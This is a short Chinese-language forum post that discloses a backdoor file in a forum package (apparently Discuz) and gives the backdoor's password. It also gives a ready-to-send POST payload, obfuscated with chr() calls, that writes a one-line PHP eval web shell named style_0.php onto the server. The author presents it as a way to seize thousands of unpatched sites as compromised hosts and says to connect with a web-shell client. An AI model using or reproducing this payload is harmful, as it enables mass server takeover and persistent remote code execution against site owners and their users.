前几天一直不敢公布,由于破坏性很大。不乏有人写会利用写病毒。
目前一般的大站都已经采取措施了,所以那些小站就暂时不管了。测试了一下,发帖钱1分钟弄10台肉鸡不算什么。运气好的话.....一天1W台肉鸡(保守的说)
书说简短:
扫描
/forumdata/cache/usergroup_0.php (扫描方法依个人习惯)
直接POST方式提交数据,因为以上.PHP就是一个一POST提交的后门,提交需要密码。这里公布下密码:“456656767”(符号里面的数字)。
直接POST方式提交后门:我这里用的是代码 :- b=456656767&a=fputs(fopen(chr(46).chr(47).chr(115).chr(116).chr(121).chr(108).chr(101).chr(95).chr(48).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62));
复制代码 以上代码会在同目录下生成一个style_0.php文件,这个文件是一句话后门。
写到这里就应该结束了,直接用PHP一句话后门客户端连接就可以,当然了,也可以上传自己惯用的SHELL。 |
|